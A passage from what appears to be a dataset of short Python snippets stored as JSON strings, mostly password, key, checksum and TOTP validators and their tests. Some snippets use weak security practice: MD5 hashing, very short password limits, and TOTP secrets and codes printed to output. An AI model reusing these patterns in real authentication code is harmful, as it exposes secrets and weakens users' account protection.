check_digit(raw_code):\n s = sum(code(char) * 2**index for index, char in enumerate(raw_code))\n return s % 11 % 10", "def is_secure(self):\n return (self.nbits % 8 == 0) and (self.nbits >= params.MINIMUM_KEY_SIZE)", "def validate_authkey(value):\n if not len(value) == 32:\n raise ValidationError(\n 'Value must be a string containing 32 alphanumeric characters')", "def __len__(self):\n return self.cli.passwords.len()", "def validate_password(data):\n\n if \"password\" not in data:\n return False\n password = data[\"password\"]\n if len(password) < 4 or len(password) > 16:\n return False\n\n return True", "def passWord(pwd):\n pwdLen = len(pwd)\n if pwdLen < 4:\n raise Exception(\"The password is too short.\")\n if pwdLen > 8:\n raise Exception(\"tHE password is too long\")\n else:\n print('the length of the password is correct.')", "def SecondPart():\n return passwordChecker(data)", "def is_reserved(code):\n return 1000 <= code <= 2999", "def check_valid_fernet(value):\n try:\n decoded = base64.urlsafe_b64decode(value)\n if len(decoded) != 32: return False\n return True\n except binascii.Error:\n return False", "def get_code_length(code):\n ignore = [\"{\", \"}\", \"(\", \")\", \";\", \":\"]\n for ig in ignore:\n code = code.replace(ig, \"\")\n return len([e.strip() for e in code.split(\"\\n\") if (not e.strip() == \"\") and (not e.strip() == u\"'\") and (not e.strip() == u\"u'\")])", "def checksum(code):\n return sum(code) % 256", "def check_verify_code(self):\n r = self.session.get(self.check_url)\n s = r.text\n data = json.loads(s[s.index('{'):-1])\n if data.get('codestring'):\n return data.get('codestring', \"\")\n return \"\"", "def check_password_strength():\r\n\r\n password_regex = re.compile(r'''(\r\n (?=.*[A-Z]{2})\r\n (?=.*[a-z]{3})\r\n (?=.*[/!@#$%^&_*+'\\\"-?.:;<>,])\r\n (?=.*[0-9])\r\n .{8,}\r\n )''', re.VERBOSE)\r\n\r\n get_password(password_regex)", "def verifyHashcode(digest):\n list_str = [\"0\", \"1\", \"2\", \"3\", \"4\", \"5\", \"6\", \"7\", \"8\", \"9\", \"A\", \"B\", \"C\", \"D\", \"E\", \"F\"]\n list_num = [ 0 , 1 , 2 , 3 , 4 , 5 , 6 , 7 , 8 , 9 , 10 , 11 , 12 , 13 , 14 , 15 ]\n \n total = 0\n for i2 in range(len(digest)):\n digest_i = digest[i2]\n #print(\"digest_i =\", digest_i)\n \n for i1 in range(16):\n if digest_i == list_str[i1] and i2 != 0:\n total += list_num[i1]\n #print(\"total =\", total)\n #print(\"list_num[i1] =\", list_num[i1])\n continue\n \n #print(\"--- --- ---\")\n \n #print(\"total =\", total)\n \n checknum = total % 16\n #print(\"checknum =\", checknum)\n \n checkstr = list_str[checknum]\n #print(\"checkstr =\", checkstr)\n \n checkorg = digest[0]\n #print(\"checkorg =\", checkorg)\n \n if checkorg == checkstr:\n isValid = True\n else:\n isValid = False\n \n return isValid", "def test_valid_luhn(self):\n assert luhn_checksum(\"79927398713\") == 0", "def code_verifier(n_bytes=64):\n verifier = base64.urlsafe_b64encode(os.urandom(n_bytes)).rstrip(b'=')\n # https://tools.ietf.org/html/rfc7636#section-4.1\n # minimum length of 43 characters and a maximum length of 128 characters.\n if len(verifier) < 43:\n raise ValueError(\"Verifier too short. n_bytes must be > 30.\")\n elif len(verifier) > 128:\n raise ValueError(\"Verifier too long. n_bytes must be < 97.\")\n else:\n return verifier", "def pwd_len():\r\n while True:\r\n password_length = input('How much length for password u want ? Minimum length is 6 and Maximum length is 25 : ')\r\n try:\r\n password_length = int(password_length)\r\n if 6 <= password_length <= 25:\r\n break\r\n else:\r\n print('{} is not in range'.format(password_length))\r\n except ValueError:\r\n print('{} is not an integer'.format(password_length))\r\n return password_length", "def test_rfc_nickkey_length(s):\n assert len(util.rfc_nickkey(s)) == len(s)", "def calculate_checksum(code):\n\n sum_odd = reduce(sum_chars, code[::2])\n sum_even = reduce(sum_chars, code[1:-1:2])\n check = (sum_even + sum_odd * 3) % 10\n\n if check == 0:\n return 0\n else:\n return 10 - check", "def test_length(self):\n form_data = self.form_data('c897B$eH@')\n form = self.form(data=form_data, user=self.u)\n self.assertFalse(form.is_valid())", "def source_data_key_length_check(source_data_key, algorithm):\n if len(source_data_key.data_key) != algorithm.kdf_input_len:\n raise InvalidDataKeyError(\n \"Invalid Source Data Key length {actual} for algorithm required: {required}\".format(\n actual=len(source_data_key.data_key), required=algorithm.kdf_input_len\n )\n )", "def len12(self, len): # -> None:\n ...", "def validate(msg):\n valid = True\n\n if not msg or len(msg) < 4:\n return False, -1, -1\n\n checksum = msg[-1]\n length = int(''.join('{:02X}'.format(byte) for byte in msg[1:3]), 16)\n # try:\n # # here works for pyton 3 only\n # length = int.from_bytes(msg[1:3], byteorder='big', signed=False)\n # except Exception:\n # length = int(''.join('{:02X}'.format(byte) for byte in msg[1:3]), 16)\n\n validlen = len(msg[3:-1])\n validsum = 0xFF - ((sum(msg[3:-1])) & 0xFF)\n\n # print('length: ' + str(self.length) + '; ' + str(validlen))\n # print('checksum: ' + str(self.checksum) + '; ' + str(validsum))\n\n # check sanity of computed Length and Checksum with the one in the message\n if (checksum != validsum) or (length != validlen):\n valid = False\n\n return valid, length, checksum", "def symbol_len(password_length):\r\n while True:\r\n symb_length = input('How much symbols you want in password? At least 1 : ')\r\n try:\r\n symb_length = int(symb_length)\r\n if 1 <= symb_length <= (password_length - 2):\r\n break\r\n else:\r\n print('{} is not in range'.format(symb_length))\r\n except ValueError:\r\n print('{} is not an integer'.format(symb_length))\r\n return symb_length", "def valid_pass(password):\r\n if len(password) >= 8 and len(password) <= 25 and password != \"forgot\":\r\n return True\r\n\r\n else:\r\n print(\"This is not a vaid password\")\r\n print(\"Password should be between 8 and 25 letters\")\r\n\r\n return False", "def isEncAddress(key):\n\tif re.search('^EAddr38[a-km-zA-HJ-NP-Z0-9]{56}$', key):\n\t\tif checkChecksum(key) is False:\n\t\t\treturn True, 'checksum'\n\t\treturn True, 'good'\n\telse:\n\t\treturn False, 'not valid'", "def check(string):\n if string[4]==\" \" and string[9]==\" \" and string[14]==\" \":\n add = 0\n count = 0\n for i in string:\n if 48<=ord(i)<= 57 or ord(i)==32:\n if 48 <= ord(i)<=57:\n add+=int(i)\n count+=1\n print(add,count)\n #return bool(count == 16)", "def verify(s):\n\t# Remove any spurious characters\n\ts = re.sub(r'[^0-9xX]', '', s).upper().strip()\n\n\tl = len(s)\n\n\tif l==10:\n\t\tif verify_10(s):\n\t\t\treturn s\n\telif l==13:\n\t\tif verify_13(s):\n\t\t\treturn s\n\n\t# It's not the right length to be an ISBN\n\treturn False", "def test_maxlength(self):\n val = DwcaValidator(yaml.load(self.yaml_length, Loader=yaml.FullLoader),\n error_handler=WhipErrorHandler)\n document = {'license_plate': 'AF8934'}\n self.assertTrue(val.validate(document))\n\n document = {'license_plate': '123456'}\n self.assertTrue(val.validate(document))\n\n document = {'license_plate': 'AF893'}\n self.assertTrue(val.validate(document))\n\n document = {'license_plate': 'AF8-934'}\n self.assertFalse(val.validate(document))\n\n document = {'license_plate': 'AF 934'}\n self.assertFalse(val.validate(document))", "def valid_serial_key(serial_key):\n parts = serial_key.split('-')\n if len(parts) != 5:\n return False\n\n for part in parts:\n if not re.match('[A-Z0-9]{5}$', part):\n return False\n\n return True", "def test_password_length(self):\n response = self.client().post('/api/v1/auth/signup', data=self.user_data_4)\n self.assertEqual(response.status_code, 400)\n # return result in json format\n result = json.loads(response.data.decode())\n self.assertEqual(\n result[\"message\"], \"Password should not be less than four characters.\")", "def valid_barcode(s):\n # implement this function!\n odd_digits = 0\n even_digits = 0\n result = 0\n for i in range(len(s) - 1):\n if i % 2 == 0:\n odd_digits += int(s[i])\n else:\n even_digits += int(s[i])\n result = (3 * odd_digits + even_digits) % 10\n if result != 0:\n result = 10 - result\n\n try:\n if int(s[-1]) == result and len(s) == 12:\n return True\n else:\n return False\n except IndexError:\n return False", "def verify_code(email, val):\r\n # TODO: is this the right string?\r\n verification_string = email.lower() + '|' + val\r\n return hashlib.md5(verification_string).hexdigest()", "def test_password_strength_validator(self):\n self.assertIsNone(validate_password_strength('abcd123'))", "def test_invalid_luhn(self):\n assert luhn_checksum(\"79927398714\") != 0", "def _validate_instruction_code_23E(self, val):\n validate_instruction_code(val)\n return val", "def test_allowed_chars(self):\n hash_val = self.reverse_hash.get_hash('123')\n self.assertEqual(hash_val['error'], 'allowed chars {}'.format(self.reverse_hash.letters))", "def validate(info):\n\n\tif info == \"\": \n\t\treturn False\n\telse:\n\t\tif len(info) < 5 or len(info) > 32:\n\t\t\treturn False\n\t\telse:\n\t\t\treturn True", "def is_valid_control_number(id_code: str) -> bool:\n sum = 1 * int(id_code[:1]) + 2 * int(id_code[1:2]) + 3 * int(id_code[2:3]) + 4 * int(id_code[3:4]) + 5 * \\\n int(id_code[4:5]) + 6 * int(id_code[5:6]) + 7 * int(id_code[6:7]) + 8 * int(id_code[7:8]) + 9 *\\\n int(id_code[8:9]) + 1 * int(id_code[9:10])\n control_number = sum % 11\n if int(control_number) == int(id_code[10:11]):\n return True\n elif int(control_number) == 10:\n sum = 3 * int(id_code[:1]) + 4 * int(id_code[1:2]) + 5 * int(id_code[2:3]) + 6 * int(id_code[3:4]) + 7 * \\\n int(id_code[4:5]) + 8 * int(id_code[5:6]) + 9 * int(id_code[6:7]) + 1 * int(id_code[7:8]) + 2 * \\\n int(id_code[8:9]) + 3 * int(id_code[9:10])\n control_number = sum % 11\n if control_number == int(id_code[10:11]):\n return True\n elif control_number == 10:\n if int(id_code[10:11]) == 0:\n return True\n else:\n return False\n else:\n return False", "def test_minlength(self):\n val = DwcaValidator(yaml.load(self.yaml_length, Loader=yaml.FullLoader),\n error_handler=WhipErrorHandler)\n document = {'postal_code': '9050'}\n self.assertTrue(val.validate(document))\n\n document = {'postal_code': 'B-9050'}\n self.assertTrue(val.validate(document))\n\n document = {'postal_code': '905'}\n self.assertFalse(val.validate(document))", "def cleanCode(si):\n while len(si) < 4: si += 'x' # fill out the length of the code string\n so = \"\"\n for ii in range(4):\n if si[ii] in \"1234567890abcdefxyABCDEFX\": # check if this is a valid character\n# [0-9a-fA-FxyX]\n so += si[ii] # valid character\n else:\n so += \"xxxx\" # fill the string with 'x'\n ii = 4 # hit a bad one, stop checking string\n return so[:4] # clean code is 4 characters long", "def ospf_lsa_checksum(lsa):\n return fletcher16_checkbytes(b\"\\x00\\x00\" + lsa[2:], 16) # leave out age", "def create_secret_code():\n characters = string.ascii_uppercase + string.digits\n size = 6\n return ''.join(random.choice(characters) for _ in range(size))", "def validate_code(request):\n user_id = api.keystone.get_user_id(request)\n print \"USER CHECK\"\n print user_id\n user = api.keystone.user_get(request, user_id)\n user_auth_code = request.GET.get('auth_code', None)\n secret = request.GET.get('secret', None)\n\n #Generate a code form our side using algorithm and use it to validate\n generated_code = api.keystone.generate_totp(secret)\n\n print secret\n print user_auth_code\n print generated_code\n print 'entering code comparison'\n \n data = {}\n extra = {}\n\n #Code comparison\n if user_auth_code == generated_code:\n data['totp_authenticated'] = True\n extra['two_factor_enabled'] = True\n\textra['secret_key'] = secret\n api.keystone.enable_2fa(request, user, **extra)\n else:\n \tprint 'falseeeeee'\n data['totp_authenticated'] = False\n return JsonResponse(data)", "def _get_checksum(code: str) -> int:\r\n total = 0\r\n\r\n for index, digit in enumerate(code):\r\n digit = int(digit)\r\n if (index + 1) % 2 != 0:\r\n digit *= 2\r\n if digit > 9:\r\n digit -= 9\r\n total += digit\r\n\r\n checksum = 10 - total % 10\r\n\r\n return checksum if checksum != 10 else 0", "def check_ean(eancode):\n if not eancode:\n return True\n if len(eancode) <> 13:\n return False\n try:\n int(eancode)\n except:\n return False\n return ean_checksum(eancode) == int(eancode[-1])", "def test_generate_secret(self):\n random_secret = ef_password.generate_secret(24)\n self.assertEqual(len(random_secret), 24)\n assert not set('[~!@#$%^&*()_+{}\":;\\']+$').intersection(random_secret)", "def validate_uuid(self, uuid_to_check):\r\n if re.fullmatch(BASE62_REGEX, uuid_to_check):\r\n return 20 <= len(uuid_to_check) <= 22\r\n else:\r\n return False", "def test_luhn_checksum(self):\n check_digit = calculate_luhn(\"7992739871\")\n assert check_digit == 3", "def checkZipCode(data):\n if len(data) < 5:\n while len(data) < 5:\n data = '0' + data\n elif len(data) > 5:\n data = data[0:4]\n # print(data)\n return (data)", "def verify(self, k, code, counter = -1, window=30, allowed_steps=2):\n # if counter == -1:\n # verifycode = self.hotp(k, counter)\n # else:\n for i in range(0, allowed_steps + 1):\n c = hex(int((time.time() - i * window) // window))[2:]\n while len(c) < 16:\n c = \"0\" + c\n\n verifycode = self.totp(k, c, window=window)\n if code == verifycode:\n return True\n return False", "def test_random_password():\n output = sh.random_password()\n assert isinstance(output, str) is True\n assert len(output) == 16", "def mobile_len_validator(mobile):\n if len(mobile) != 13:\n raise ValidationError('Invalid mobile len')", "def check(s1):\n chars = [0] * 128\n for c in s1:\n chars[ord(c)]+=1\n\n counter = 0\n for i in range(len(chars)):\n if chars[i] %2 != 0:\n counter+=1\n \n return counter <= 1", "def check_secure_val(secure_val):\n val = secure_val.split('|')[0]\n if secure_val == make_secure_val(val):\n return val", "def check_secure_val(secure_val):\n val = secure_val.split('|')[0]\n if secure_val == make_secure_val(val):\n return val", "def test_invalid_numeric_code_length_format(self, cred, language):\n resp = requests.get(verify_url.format('json', cred[0], cred[1],\n 'TestApp', test_number), params={'lg': language})\n assert resp.status_code == 200\n assert resp.headers['Content-Type'] == 'application/json'\n assert resp.json()['status'] == '3'\n assert resp.json()['error_text'] == invalid_value_msg.format('lg')", "def check_string_length(string):\n if len(string) > 255:\n sys.exit(\"ERROR: Max permitted string length is 255\")", "def test_long(self):\n s = \"abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ 